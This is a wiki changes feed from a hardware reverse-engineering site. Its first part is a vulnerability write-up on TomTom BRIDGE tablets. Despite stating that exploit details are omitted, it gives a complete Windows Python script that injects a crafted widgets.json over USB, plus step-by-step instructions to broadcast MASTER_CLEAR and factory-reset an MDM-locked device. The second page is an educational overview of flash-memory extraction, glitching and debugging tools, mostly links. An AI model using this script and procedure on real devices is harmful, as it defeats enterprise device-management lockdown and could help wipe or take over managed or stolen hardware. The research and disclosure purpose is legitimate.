Because the device runs 4.3 (kernel patched Jun 14 2017), it relies on legacy Device Administrator mechanisms rather than modern Android Enterprise (Device Owner) APIs.&lt;br /&gt;
&lt;br /&gt;
==== createPackageContext misuse (research finding) ====&lt;br /&gt;
During analysis of the TomTom BRIDGE platform, a potential issue was identified related to the use of the Android API method &amp;lt;code&amp;gt;createPackageContext()&amp;lt;/code&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
===== Background =====&lt;br /&gt;
The &amp;lt;code&amp;gt;createPackageContext()&amp;lt;/code&amp;gt; method allows an application to create a context for another installed package. When used with specific flags (e.g., &amp;lt;code&amp;gt;CONTEXT_INCLUDE_CODE&amp;lt;/code&amp;gt; or &amp;lt;code&amp;gt;CONTEXT_IGNORE_SECURITY&amp;lt;/code&amp;gt;), it can enable access to that application's resources or code, depending on system permissions and signature alignment.&lt;br /&gt;
&lt;br /&gt;
This mechanism is typically restricted to:&lt;br /&gt;
* System applications&lt;br /&gt;
* Applications signed with the same certificate&lt;br /&gt;
* Privileged contexts with elevated permissions&lt;br /&gt;
&lt;br /&gt;
===== Observed behavior =====&lt;br /&gt;
Testing on the PRO 8275 (Android 6.0.1) indicated that:&lt;br /&gt;
* Certain preinstalled or privileged applications expose functionality that can be accessed via &amp;lt;code&amp;gt;createPackageContext()&amp;lt;/code&amp;gt;&lt;br /&gt;
* In some cases, access controls appeared weaker than expected for a hardened enterprise deployment&lt;br /&gt;
* The behavior may allow interaction with components or resources outside the normal application sandbox&lt;br /&gt;
&lt;br /&gt;
===== Proof of concept (high-level demonstration) =====&lt;br /&gt;
This demonstration is intentionally limited and omits exploit details. It is intended to validate behavior in a controlled research environment only.&lt;br /&gt;
&lt;br /&gt;
Weakness in the system is the widget.json fechter from Internal storage.&amp;lt;/br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
com.tomtom.navpad.widgetorganizerlib.WidgetInfoFetcher.fetchInstalledWidgets&amp;lt;/br&amp;gt;&lt;br /&gt;
and&amp;lt;/br&amp;gt;&lt;br /&gt;
com.tomtom.navpad.widgetorganizerlib.WidgetInfoFetcher.fetchInstalledApplications&amp;lt;/br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;java&amp;quot;&amp;gt;&lt;br /&gt;
    private void fetchInstalledApplications(Context context, boolean showTestapps) {&lt;br /&gt;
        Drawable iconDrawable;&lt;br /&gt;
        if (!$assertionsDisabled &amp;amp;&amp;amp; context == null) {&lt;br /&gt;
            throw new AssertionError();&lt;br /&gt;
        }&lt;br /&gt;
        if (mAppShortcutsInfoCachedList != null) {&lt;br /&gt;
            this.mWidgetInfoList.addAll(mAppShortcutsInfoCachedList);&lt;br /&gt;
            generateWidgetInfoMap();&lt;br /&gt;
            return;&lt;br /&gt;
        }&lt;br /&gt;
        Resources resources = context.getResources();&lt;br /&gt;
        ArrayList&amp;lt;CachedActivityInfo&amp;gt; apps = createAppList(context, showTestapps);&lt;br /&gt;
        int widgetIndex = 0;&lt;br /&gt;
        for (CachedActivityInfo app : apps) {&lt;br /&gt;
            ActivityInfo activityInfo = app.getActivityInfo();&lt;br /&gt;
            String appPackageName = activityInfo.packageName;&lt;br /&gt;
            String appClassName = activityInfo.name;&lt;br /&gt;
            if (!NAVAPP_PACKAGE_NAME.equals(appPackageName) || !&amp;quot;com.tomtom.navpad.navapp.NavPadAppDrawerActivity&amp;quot;.equals(appClassName)) {&lt;br /&gt;
                if (this.mIsConfigurable || !NAVAPP_PACKAGE_NAME.equals(appPackageName) || !&amp;quot;com.tomtom.navpad.navapp.NavPadWidgetDrawerActivity&amp;quot;.equals(appClassName)) {&lt;br /&gt;
                    int pageIndex = widgetIndex / 8;&lt;br /&gt;
                    int widgetIndexOnPage = widgetIndex % 8;&lt;br /&gt;
                    WidgetInfo wInfo = new WidgetInfo();&lt;br /&gt;
                    wInfo.setWidgetType(WidgetInfo.WidgetType.APPSHORTCUT);&lt;br /&gt;
                    wInfo.setIsFromDrawer(true);&lt;br /&gt;
                    wInfo.setId(widgetIndex + 1);&lt;br /&gt;
                    wInfo.setPackageName(appPackageName);&lt;br /&gt;
                    wInfo.setClassName(appClassName);&lt;br /&gt;
                    wInfo.setPageNumber(pageIndex + 1);&lt;br /&gt;
                    wInfo.setEnabled(true);&lt;br /&gt;
                    wInfo.setLayoutColumn(widgetIndexOnPage % 4);&lt;br /&gt;
                    wInfo.setLayoutRow(widgetIndexOnPage / 4);&lt;br /&gt;
                    wInfo.setBackgroundColor(resources.getColor(R.color.navpad_homescreen_background_color));&lt;br /&gt;
                    wInfo.setTextColor(resources.getColor(R.color.navpad_homescreen_appshortcut_text_color));&lt;br /&gt;
                    wInfo.setName(app.getLabel());&lt;br /&gt;
                    try {&lt;br /&gt;
                        Context otherAppCtx = context.createPackageContext(appPackageName, 2);&lt;br /&gt;
                        iconDrawable = otherAppCtx.getResources().getDrawableForDensity(activityInfo.getIconResource(), 320);&lt;br /&gt;
                    } catch (PackageManager.NameNotFoundException e) {&lt;br /&gt;
                        if (Log.W) {&lt;br /&gt;
                            Log.w(TAG, &amp;quot;Could not find package &amp;quot; + appPackageName + &amp;quot; to fetch larger icon.&amp;quot;);&lt;br /&gt;
                        }&lt;br /&gt;
                        iconDrawable = activityInfo.loadIcon(context.getPackageManager());&lt;br /&gt;
                    } catch (Resources.NotFoundException e2) {&lt;br /&gt;
                        if (Log.W) {&lt;br /&gt;
                            Log.w(TAG, &amp;quot;Could not fetch xhdpi icon from package &amp;quot; + appPackageName + &amp;quot; reverting to default icon.&amp;quot;);&lt;br /&gt;
                        }&lt;br /&gt;
                        iconDrawable = activityInfo.loadIcon(context.getPackageManager());&lt;br /&gt;
                    }&lt;br /&gt;
                    wInfo.setIconDrawable(iconDrawable);&lt;br /&gt;
                    this.mWidgetInfoList.add(wInfo);&lt;br /&gt;
                    widgetIndex++;&lt;br /&gt;
                }&lt;br /&gt;
            }&lt;br /&gt;
        }&lt;br /&gt;
        generateWidgetInfoMap();&lt;br /&gt;
        mAppShortcutsInfoCachedList = this.mWidgetInfoList;&lt;br /&gt;
    }&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Start the tablet in MDM mode or admin locked restricted mode. Start the '''PoC python script''' when the tablet is connected to the computer by MicroUSB wire and when a error occurs on the screen the code executed succesfully. Now press ok and swipe to left on the home screen and now you see '''Debug Intent Sender''', open it and fill in the action textbox '''&amp;quot;android.intent.action.MASTER_CLEAR&amp;quot;''' now press send broadcast and your locked device is '''factory reset'''.&lt;br /&gt;
&lt;br /&gt;
PoC script (Windows only, pymtp on Linux is a incomplete fork and does not work).&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;python&amp;quot;&amp;gt;&lt;br /&gt;
import os&lt;br /&gt;
import json&lt;br /&gt;
import time&lt;br /&gt;
import win32com.client&lt;br /&gt;
&lt;br /&gt;
OUTPUT_FILE = &amp;quot;widgets.json&amp;quot;&lt;br /&gt;
&lt;br /&gt;
JSON_DATA = {&lt;br /&gt;
    &amp;quot;application&amp;quot;: [&lt;br /&gt;
        {&lt;br /&gt;
            &amp;quot;package_name&amp;quot;: &amp;quot;com.android.settings&amp;quot;,&lt;br /&gt;
            &amp;quot;class_name&amp;quot;: &amp;quot;com.android.settings.DebugIntentSender&amp;quot;,&lt;br /&gt;
            &amp;quot;startcell&amp;quot;: &amp;quot;2.11&amp;quot;,&lt;br /&gt;
            &amp;quot;endcell&amp;quot;: &amp;quot;2.11&amp;quot;&lt;br /&gt;
        }&lt;br /&gt;
    ]&lt;br /&gt;
}&lt;br /&gt;
&lt;br /&gt;
with open(OUTPUT_FILE, &amp;quot;w&amp;quot;) as f:&lt;br /&gt;
    json.dump(JSON_DATA, f, indent=4)&lt;br /&gt;
&lt;br /&gt;
shell = win32com.client.Dispatch(&amp;quot;Shell.Application&amp;quot;)&lt;br /&gt;
my_computer = shell.NameSpace(17)&lt;br /&gt;
&lt;br /&gt;
tomtom_device = None&lt;br /&gt;
for item in my_computer.Items():&lt;br /&gt;
    if &amp;quot;tomtom&amp;quot; in item.Name.lower():&lt;br /&gt;
        tomtom_device = item&lt;br /&gt;
        break&lt;br /&gt;
&lt;br /&gt;
if not tomtom_device:&lt;br /&gt;
    print(&amp;quot;TomTom device not found.&amp;quot;)&lt;br /&gt;
    exit(1)&lt;br /&gt;
&lt;br /&gt;
device_root = tomtom_device.GetFolder&lt;br /&gt;
&lt;br /&gt;
device_root.CopyHere(os.path.abspath(OUTPUT_FILE))&lt;br /&gt;
time.sleep(2)&lt;br /&gt;
&lt;br /&gt;
print(f&amp;quot;{OUTPUT_FILE} successfully injected DebugIntentSender.&amp;quot;)&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;gallery widths=&amp;quot;120px&amp;quot; heights=&amp;quot;120px&amp;quot; perrow=&amp;quot;3&amp;quot;&amp;gt;&lt;br /&gt;
https://i.ibb.co/0psNg8y4/error-after-injection.jpg|error after injection&lt;br /&gt;
https://i.ibb.co/HTHtyDL0/debugintentsender.jpg|DebugIntentSender class&lt;br /&gt;
https://i.ibb.co/bgZj324Y/broadcast.jpg|broadcast MASTER_CLEAR intent&lt;br /&gt;
&amp;lt;/gallery&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===== Research paper =====&lt;br /&gt;
[[:File:Android createPackageContext Paper 10 5 0.pdf|Android createPackageContext Paper 10 5 0.pdf]]&amp;lt;/br&amp;gt;&lt;br /&gt;
[https://www.ndss-symposium.org/wp-content/uploads/2017/09/10_5_0.pdf Download PDF remote]&lt;br /&gt;
&lt;br /&gt;
===== Disclosure status =====&lt;br /&gt;
This finding is based on internal testing and has not been publicly assigned a CVE at the time of writing.&lt;/div&gt;</summary>
		<author><name>Polymorphic7</name></author>
		
	</entry>
	<entry>
		<id>https://wiki.recessim.com/w/index.php?title=File:Error_after_injection.jpg&amp;diff=3293</id>
		<title>File:Error after injection.jpg</title>
		<link rel="alternate" type="text/html" href="https://wiki.recessim.com/w/index.php?title=File:Error_after_injection.jpg&amp;diff=3293"/>
		<updated>2026-04-03T03:11:54Z</updated>

		<summary type="html">&lt;p&gt;Polymorphic7: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;/div&gt;</summary>
		<author><name>Polymorphic7</name></author>
		
	</entry>
	<entry>
		<id>https://wiki.recessim.com/w/index.php?title=File:Android_createPackageContext_Paper_10_5_0.pdf&amp;diff=3292</id>
		<title>File:Android createPackageContext Paper 10 5 0.pdf</title>
		<link rel="alternate" type="text/html" href="https://wiki.recessim.com/w/index.php?title=File:Android_createPackageContext_Paper_10_5_0.pdf&amp;diff=3292"/>
		<updated>2026-04-03T02:42:48Z</updated>

		<summary type="html">&lt;p&gt;Polymorphic7: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;/div&gt;</summary>
		<author><name>Polymorphic7</name></author>
		
	</entry>
	<entry>
		<id>https://wiki.recessim.com/w/index.php?title=Flash_Extraction&amp;diff=3291</id>
		<title>Flash Extraction</title>
		<link rel="alternate" type="text/html" href="https://wiki.recessim.com/w/index.php?title=Flash_Extraction&amp;diff=3291"/>
		<updated>2026-04-02T14:51:18Z</updated>

		<summary type="html">&lt;p&gt;Polymorphic7: Remove Ezp2023+ and add XGECU T48 TL866 II Plus&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[[File:Flash mediawiki banner.png|frameless|1280x300px]]&lt;br /&gt;
&lt;br /&gt;
==Table==&lt;br /&gt;
====Introduction====&lt;br /&gt;
Embedded devices or smart devices store their code in a ROM or flash memory chip primarily because these types of memory are non-volatile and permanent even after power loss.&amp;lt;br&amp;gt;&lt;br /&gt;
The data is stored even after the system is turned off in contrast to volatile memory that needs to stay powered on. A prime example of this is if you put your computer in hibernate S4 or (modern standby) S0.&amp;lt;br&amp;gt;&lt;br /&gt;
The RAM memory will stay powered to keep everything in the memory active so that if you press the power button the system will be back up in seconds, if you disconnect the power the hibernated session will be gone because RAM is volatile memory.&lt;br /&gt;
&lt;br /&gt;
This wiki page will provide a basic explanation of embedded and smart devices and their ways of storing code in modern electronics and provide some great resources in regard of the extraction techniques.&amp;lt;br&amp;gt;&lt;br /&gt;
Some in-depth information regarding the subject will be shared here too.&lt;br /&gt;
----&lt;br /&gt;
====Purpose of data extraction====&lt;br /&gt;
Reverse engineering code stored in ROM firmware is a practice that serves multiple purposes across various fields, particularly in technology and security.&lt;br /&gt;
&lt;br /&gt;
One of the primary reasons for reverse engineering firmware is to identify and mitigate security vulnerabilities. As IoT devices and embedded systems become more prevalent, ensuring their security is crucial. By analyzing the firmware, security researchers can uncover weaknesses in the code that could be exploited by malicious actors locally or even remotely which could pose a high risk to many users.&lt;br /&gt;
&lt;br /&gt;
Below, we will explore the reasons why individuals and organizations engage in this process.&lt;br /&gt;
:* '''Security audits'''&lt;br /&gt;
::- '''White hats''' - good guys, safeguarding systems &amp;amp; data to prevent hackers from getting in.&lt;br /&gt;
::- '''Grey hats''' - in between good and bad.&lt;br /&gt;
::- '''Black hats''' - abusing vulnerabilities to earn money or do damage, or other illicit services.&lt;br /&gt;
:* '''Industrial hardware repair'''&lt;br /&gt;
::- Repair shops&lt;br /&gt;
::- Technical department in a company doing repairs locally&lt;br /&gt;
:* '''Recovery in mission critical failure mode (back-up a day keeps the Dr away)'''&lt;br /&gt;
::- Data recovery companies&lt;br /&gt;
&lt;br /&gt;
====Physical locations====&lt;br /&gt;
:* Chip Internal ROM (embedded inside the microcontroller most often also known as a '''SoC''' system-on-a-chip)&lt;br /&gt;
:* Chip external ROM (an external part on the PCB)&lt;br /&gt;
&lt;br /&gt;
====Types of Memory====&lt;br /&gt;
:* Various types of EEPROMs&lt;br /&gt;
::* Serial EEPROM&lt;br /&gt;
::* Parallel EEPROM&lt;br /&gt;
::* Flash Memory -&amp;gt; Bigger, faster and cheaper but less reliable (less write cycles)&lt;br /&gt;
::* NAND/NOR Flash&lt;br /&gt;
::* FeRAM&lt;br /&gt;
&lt;br /&gt;
====Chip interfaces====&lt;br /&gt;
: Also known as general-purpose ports (GPIO).&lt;br /&gt;
:* [https://en.wikipedia.org/wiki/Bit_banging Bit-Banging]&lt;br /&gt;
::- Bit-banging is the process of emulating a protocol in software instead of relying on a hardware peripheral to do the same things.&lt;br /&gt;
:* [https://en.wikipedia.org/wiki/I2C I2C]&lt;br /&gt;
::- I2C is a two-wire serial communication protocol using a serial data line (SDA) and a serial clock line (SCL). &lt;br /&gt;
::: The protocol supports multiple target devices on a communication bus and can also support multiple controllers that send and receive commands and data.&lt;br /&gt;
:::: '''Pinout'''&lt;br /&gt;
:::: VCC (1.5V up to 5V)&lt;br /&gt;
:::: SCL (I2C Clock)&lt;br /&gt;
:::: SDA (I2C Data)&lt;br /&gt;
:::: GND (Ground)&lt;br /&gt;
:* [https://en.wikipedia.org/wiki/Serial_Peripheral_Interface SPI]&lt;br /&gt;
::- SPI is a synchronous, full duplex main-subnode-based interface.&lt;br /&gt;
::: The data from the main or the subnode is synchronized on the rising or falling clock edge. Both main and subnode can transmit data at the same time. &lt;br /&gt;
::: The SPI interface can be either 3-wire (Single SPI mode), 4-wire (Dual SPI mode) or 6-wire (Quad SPI mode).&lt;br /&gt;
:::: '''Pinout Dual SPI mode'''&lt;br /&gt;
:::: MOSI (Master Out Slave In)&lt;br /&gt;
:::: MISO (Master In Slave Out)&lt;br /&gt;
:::: SCLK (Serial Clock)&lt;br /&gt;
:::: SS/CS (Slave Select)&lt;br /&gt;
:* [https://en.wikipedia.org/wiki/Parallel_Peripheral_Interface Parallel Interface]&lt;br /&gt;
::- A parallel I/O port is a mechanism that allows the software to interact with external devices. It is called parallel because multiple signals can be accessed all at once.&lt;br /&gt;
:* [https://en.wikipedia.org/wiki/Serial_Peripheral_Interface#Microwire Microwire]&lt;br /&gt;
::: Microwire, often spelled μWire, is essentially a predecessor of SPI and a trademark of National Semiconductor. &lt;br /&gt;
::: It's a strict subset of SPI: half-duplex, and using SPI mode 0. Microwire chips tend to need slower clock rates than newer SPI versions; perhaps 2 MHz vs. 20 MHz.&lt;br /&gt;
::: Some Microwire chips also support a three-wire mode.&lt;br /&gt;
:* [https://en.wikipedia.org/wiki/Serial_Peripheral_Interface#Intelligent_SPI_controllers QSPI - Intelligent SPI controllers]&lt;br /&gt;
::- The QSPI peripheral provides support for communicating with an external flash memory device using SPI.&lt;br /&gt;
:* [https://en.wikipedia.org/wiki/1-Wire One-Wire]&lt;br /&gt;
::- 1-Wire is a wired half-duplex serial bus designed by Dallas Semiconductor that provides low-speed (16.3 kbit/s) data communication and supply voltage over a single conductor.&lt;br /&gt;
::: '''[Example]''' Genuine Dell laptop power supplies use the 1-Wire protocol to transmit data over the third wire to the laptop's embedded controller, providing information about power, current, and voltage ratings.&lt;br /&gt;
::: The embedded controller then verifies that a compatible power supply is connected, allowing all VRM phases to operate at maximum duty cycle.&lt;br /&gt;
::: Emulating the [https://github.com/orgua/OneWireHub/blob/main/examples/DS2502_DELLCHG/DS2502_DELLCHG.ino DS2502 TO-92-3 1-wire Dell charger ID EEPROM.]&lt;br /&gt;
&lt;br /&gt;
=====Programming=====&lt;br /&gt;
::* In-circuit programming&lt;br /&gt;
:::: Allows programmable devices, such as microcontrollers, to be programmed while they are installed in a complete system, facilitating firmware updates without removing the chip.&lt;br /&gt;
::* Out-of-circuit programming&lt;br /&gt;
:::: Refers to the process of programming microcontrollers or integrated circuits while they are removed from their final application circuit, typically using specialized programming equipment.&lt;br /&gt;
&lt;br /&gt;
====Extraction Methods [ &amp;gt;&amp;gt; hot topic &amp;lt;&amp;lt; ]====&lt;br /&gt;
&lt;br /&gt;
=====External ROM=====&lt;br /&gt;
: In case of an external ROM you can always try to read it with a programmer and try to dump the contents this way for later static analysis.&lt;br /&gt;
&lt;br /&gt;
=====Internal ROM=====&lt;br /&gt;
When your target chip has a built-in ROM and the chip is locked you are out of luck trying to easily read the firmware in most cases.&amp;lt;br&amp;gt;&lt;br /&gt;
Here is where it comes handy to know of different methods widely used to attack these chips in order to retrieve the firmware for later static analysis or even live debugging.&lt;br /&gt;
&lt;br /&gt;
::*  1. Decapsulation&lt;br /&gt;
:::- [https://www.youtube.com/watch?v=T1rRgb9N9s4 '''RECESSIM video:''' Nitric Acid and Microscopes. Decapsulating IC's.]&lt;br /&gt;
::* 2. Bootloader hacking&lt;br /&gt;
:::;- [https://0xinfection.github.io/reversing/reversing-for-everyone.pdf Great resources on reverse engineering]&lt;br /&gt;
::* 3. Fault injection &amp;amp; Glitching Attacks&lt;br /&gt;
:::;- VCC glitching (Crowbar Circuits)&lt;br /&gt;
::::: [https://www.youtube.com/watch?v=IOD5voFTAz8 '''RECESSIM video:''' Hacking into a Locked Microchip - Reverse Engineer shows you how it's done.]&lt;br /&gt;
::::: [https://eprint.iacr.org/2016/810.pdf Example paper 1. Fault Injection using Crowbars on Embedded Systems.]&lt;br /&gt;
::::: [https://arxiv.org/pdf/1903.08102 Example paper 2. Injecting Software Vulnerabilities with Voltage Glitching.]&lt;br /&gt;
::::: [https://cardis.org/cardis2013/proceedings/CARDIS2013_16.pdf Example paper 3. Glitch it if you can: parameter search strategies for successful fault injection.]&lt;br /&gt;
::::: [https://www.researchgate.net/publication/353922465_The_Forgotten_Threat_of_Voltage_Glitching_A_Case_Study_on_Nvidia_Tegra_X2_SoCs Example paper 4. The Forgotten Threat of Voltage Glitching: A Case Study on Nvidia Tegra X2 SoCs]&lt;br /&gt;
::::: [https://www.aisec.fraunhofer.de/en/FirmwareProtection.html Example paper 5. Using Optical Fault Injection and Race Conditions to Bypass STM32F0 Series Debug Interface Protections]&lt;br /&gt;
:::::- [https://github.com/racerxdl/stm32f0-pico-dump RPi Pico Implementation Exploiting Race Conditions to Iteratively Read Firmware]&lt;br /&gt;
:::;- Clock glitching (Oscillator Circuits)&lt;br /&gt;
::::: [https://caslab.io/publications/durand2021ultra.pdf Example paper 1. Ultra Freezing Attacks and Clock Glitching of Clock Oscillator Circuits]&lt;br /&gt;
::::: [https://scispace.com/pdf/high-speed-clock-glitching-bscq4pp5j1.pdf Example paper 2. High Speed Clock Glitching]&lt;br /&gt;
::::: [https://machiry.github.io/files/glitchresistor.pdf Example paper 3. Glitching Demystified: Analyzing Control-flow-based Glitching Attacks and Defenses]&lt;br /&gt;
::::: [https://eprint.iacr.org/2023/1647.pdf Example paper 4. Attacking Glitch Detection Circuits]&lt;br /&gt;
::::: [https://eprint.iacr.org/2024/1939.pdf Example paper 5. Machine Learning-Based Detection of Glitch Attacks in Clock Signal Data]&lt;br /&gt;
:::;- EMFI (Electromagnetic Fault Injection)&lt;br /&gt;
::::: [https://pure.tue.nl/ws/files/46956556/770549-1.pdf Example paper 1. Electromagnetic fault injection using transient pulse injections a comparison of EM-FI and optical-FI on smart cards]&lt;br /&gt;
::::: [https://www.os3.nl/_media/2011-2012/courses/rp2/p19_report.pdf Example paper 2. Electro Magnetic Fault Injection]&lt;br /&gt;
::::: [https://essay.utwente.nl/65596/1/Hummel_ComputerScienceMsc_EECMS.pdf Example paper 3. Exploring Effects of Electromagnetic Fault Injection on a 32-bit High Speed Embedded Device Microprocessor]&lt;br /&gt;
::::: [https://hal-lirmm.ccsd.cnrs.fr/lirmm-01430913v1/file/Electromagnetic-fault-injection-the-curse-of-flip.pdf Example paper 4. Electromagnetic fault injection: the curse of flip-flops]&lt;br /&gt;
::* 4. Scanning Electron Microscopy (SEM)&lt;br /&gt;
:::;- An expensive method.&lt;br /&gt;
:::: [https://www.researchgate.net/figure/a-E-beam-applied-to-the-chip-and-voltage-contrast-image-created-from-the-reflected_fig3_336651339 ResearchGate - FinFET architecture under a E-beam (SEM).]&lt;br /&gt;
::* Public Fault Injection Toolkits&lt;br /&gt;
:::;- [https://github.com/newaetech/chipwhisperer ChipWhisperer]&lt;br /&gt;
:::;- [https://github.com/newaetech/chipshouter-picoemp PicoEMP]&lt;br /&gt;
&lt;br /&gt;
======Atmel SAM4C32 Glitching (Crowbar Circuit)======&lt;br /&gt;
: &amp;gt; [[:ATSAM4C32|Full in-depth wiki page can be found here.]]&lt;br /&gt;
&lt;br /&gt;
: Atmel SAM4C32 reset low period during early start-up process somewhere in the bootloader showing vulnerable time for glitch.&amp;lt;br&amp;gt;&lt;br /&gt;
: After glitching the chip, JTAG comes online serving a command prompt which allows to dump the firmware of the chip protected by Atmel's Security Bit Feature called GPNVM.&amp;lt;br&amp;gt;&lt;br /&gt;
: [[File:Atmel SAM4 series glitch.png|none|thumb|Atmel SAM4C32 glitching. Yellow VDDCORE, Purple RST..]]&lt;br /&gt;
: Credits to [https://www.0x01team.com/hw_security/bypassing-microchip-atmel-sam-e70-s70-v70-v71-security/ 0x01 Team] and [https://www.youtube.com/watch?v=IOD5voFTAz8 RECESSIM] for finding the reset low period being connected to the glitch timebase.&lt;br /&gt;
&lt;br /&gt;
====Debugging====&lt;br /&gt;
=====Debugging Hardware / Tools=====&lt;br /&gt;
::* Tools that are used to find debug ports, OCD interfaces, serial port I/O.&lt;br /&gt;
::;- [https://github.com/openocd-org/openocd OpenOCD (Open On-Chip Debugger)]&lt;br /&gt;
::;- [https://www.picotech.com/products/oscilloscope PicoScope. The modern alternative to the traditional benchtop oscilloscope.]&lt;br /&gt;
::;- [https://buspirate.com/ BusPirate - universal bus interface device for I2C and SPI.]&lt;br /&gt;
::;- [https://github.com/travisgoodspeed/goodfet GoodFET JTAG adapter]&lt;br /&gt;
::;- [https://mouser.com/new/segger/seggerjlink/ J-Link In-Circuit Debugger]&lt;br /&gt;
::;- [https://github.com/grandideastudio/jtagulator JTAGulator is an open source hardware tool that assists in identifying OCD interfaces from test points, vias, component pads, or connectors on a target device.]&lt;br /&gt;
&lt;br /&gt;
=====Logic Analyzer=====&lt;br /&gt;
:: [https://hardwear.io/netherlands-2024/speakers/sasha-sheremetov.php hardwear.io - Hacking NAND Memory Pinout using Logic Analyzer.]&lt;br /&gt;
:: '''Abstract:'''&lt;br /&gt;
:: This presentation is about analysis of technological pinout of NAND memory in such devices as microSD, eMMC and other monolithic chips using a logic analyzer.&lt;br /&gt;
:: YouTube video: https://www.youtube.com/watch?v=sgl9Sfu79Lc&lt;br /&gt;
&lt;br /&gt;
====Non-intrusive methods====&lt;br /&gt;
=====[Vector] Factory debug / programming ports=====&lt;br /&gt;
::* JTAG (primarily used for testing and debugging electronic circuits)&lt;br /&gt;
:::- Finding a unpopulated or populated JTAG port on the PCB.&lt;br /&gt;
::* UART (an asynchronous serial communication protocol that transmits data)&lt;br /&gt;
:::* TTL&lt;br /&gt;
::::: TTL defines voltage levels in digital logic circuits&lt;br /&gt;
:::::* [https://en.wikipedia.org/wiki/Level_shifter Level shifters]&lt;br /&gt;
=====[Vector] Network based [over-the-air (OTA) programming]=====&lt;br /&gt;
::* Network stack - &amp;gt; WLAN / BT firmware bugs (OSI layer 1. physical)&lt;br /&gt;
::::- Example 1. Broadcom Wi-Fi SoC remote heap overflow [https://www.exploit-db.com/exploits/41805 CVE 2017-0561]&lt;br /&gt;
::::- Example 2. Qualcomm Wi-Fi stack based buffer overflow [https://app.opencve.io/cve/CVE-2022-33279 CVE-2022-33279]&lt;br /&gt;
::::- Example 3. node-bluetooth remote buffer overflow [https://github.com/advisories/GHSA-cxx3-36qc-m6qm CVE-2023-26110]&lt;br /&gt;
::* Network stack - &amp;gt; Promiscuous mode eavesdropping&lt;br /&gt;
:::: Promiscuous mode eavesdropping is needed to audit software code because it allows the monitoring of all network traffic, enabling auditors to detect&lt;br /&gt;
:::: unauthorized data access and vulnerabilities that may not be visible through standard monitoring methods.&lt;br /&gt;
:::; &amp;lt;pre style=&amp;quot;font-weight: normal;&amp;quot;&amp;gt;Promiscuous mode eavesdropping is a network monitoring technique where a network interface card (NIC) captures all packets on the network segment, regardless of their destination address. This allows authorized or unauthorized users to intercept sensitive data transmitted over the network.&amp;lt;/pre&amp;gt;&lt;br /&gt;
::* Network stack - &amp;gt; MiTM (Man-in-the-middle) methods&lt;br /&gt;
:::;- SSL stripping&lt;br /&gt;
::::: '''Mitmproxy''' is your swiss-army knife for debugging, testing, privacy measurements, and penetration testing.&lt;br /&gt;
:::::: [https://mitmproxy.org/ Click here for more details.]&lt;br /&gt;
::::: '''Exploitation of Trust''' by OSI layer 7 local client modifications to do '''cert pinning''' (local pentesting).&lt;br /&gt;
:::::: Github example [https://github.com/Fuzion24/JustTrustMe/blob/master/app/src/main/java/just/trust/me/Main.java click here.]&lt;br /&gt;
::* Local - &amp;gt; Cryptographic checksums&lt;br /&gt;
:::: A cryptographic checksum is a mathematical value generated by a cryptographic algorithm to verify the integrity of data, ensuring that it has not been altered during transmission or storage.&lt;br /&gt;
:::; &amp;lt;pre style=&amp;quot;font-weight: normal;&amp;quot;&amp;gt;Not only are OTA updates after being downloaded over TCP+TLS by a device cryptographically checked to make sure the authenticity and integrity is accounted for, if this was not the case it could install a malicious update or simply brick million of devices. TCP already ensures data integrity through checksums and error detection mechanisms so by adding even more checks it's redundance is high.&amp;lt;/pre&amp;gt;&lt;br /&gt;
::* Local - &amp;gt; Signed updates&lt;br /&gt;
:::: A cryptographic signed package is a digital package that includes a cryptographic signature, ensuring the package’s authenticity, integrity, and origin from a trusted entity.&lt;br /&gt;
:::: This signature verifies that the package has not been altered since it was signed.&lt;br /&gt;
:::; &amp;lt;pre style=&amp;quot;font-weight: normal;&amp;quot;&amp;gt;Signing an OTA update package involves applying a digital signature using cryptographic methods. This process serves several critical purposes. 1. Authenticity. 2. Integrity.&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
====Programmers / Flash Utilities &amp;amp; Nand Flash Controllers ====&lt;br /&gt;
=====Programmers=====&lt;br /&gt;
======SOP16 / 8 / VSOP8 / WSON8 / PDIP8 / SO8 / TSSOP8 / UFDFPN8======&lt;br /&gt;
:: ➤ CH341A programmer&lt;br /&gt;
:::;- [https://www.onetransistor.eu/2017/08/ch341a-mini-programmer-schematic.html CH341A Mini Programmer Schematic and Drivers blogpost.]&lt;br /&gt;
:: ➤ XGECU T48 TL866 II Plus&lt;br /&gt;
:::;- Budget friendly high speed 30mhz programmer supports a wide range of chips (EEPROM/Flash/MCU/BIOS/SPI/NOR/NAND/EMMC) including high-capacity nand (up to 256gb).&amp;lt;br&amp;gt; Adjustable VCC/VPP voltages (1.8-6.5v up to 25v), logic testing and pin diagnostics. Broad OS support from Win XP to Win11.&lt;br /&gt;
=====Flash Utilities=====&lt;br /&gt;
:: ➤ flashrom (Support: SPI/BIOS/EC)&lt;br /&gt;
:::;- [https://github.com/flashrom/flashrom flashrom] - is a utility for identifying, reading, writing, verifying and erasing flash chips. It is designed to flash BIOS/EFI/coreboot/firmware/optionROM images on mainboards, network/graphics/storage controller cards, and various other programmer devices.&lt;br /&gt;
&lt;br /&gt;
=====Nand Flash Controllers=====&lt;br /&gt;
Listing of nand flash controller interface chips &amp;amp; off the shelf hardware (cheap stuff).&amp;lt;br&amp;gt;&lt;br /&gt;
Since the search engine is broken @ the usual suspects: DHgate, Gearbest, Banggood, Aliexpress or various other China stores. I use a search query for example '''“TSOP48  usb pcb controller flash disk site:aliexpress.com”''' in image search mode.&lt;br /&gt;
======BGA-153======&lt;br /&gt;
:: ➤ ['''UFS'''] JMicron JMS901 USB 3 (single channel nand supported)&lt;br /&gt;
:: ➤ ['''eMMC'''] Alcor Micro AU6438 USB 2.0 (single channel nand supported)&lt;br /&gt;
&lt;br /&gt;
======TSOP48 ======&lt;br /&gt;
:: ➤ Innostor IS917 [https://flash-extractor.com/library/IS/IS917/ click here for details (Flash-extractor library)]&lt;br /&gt;
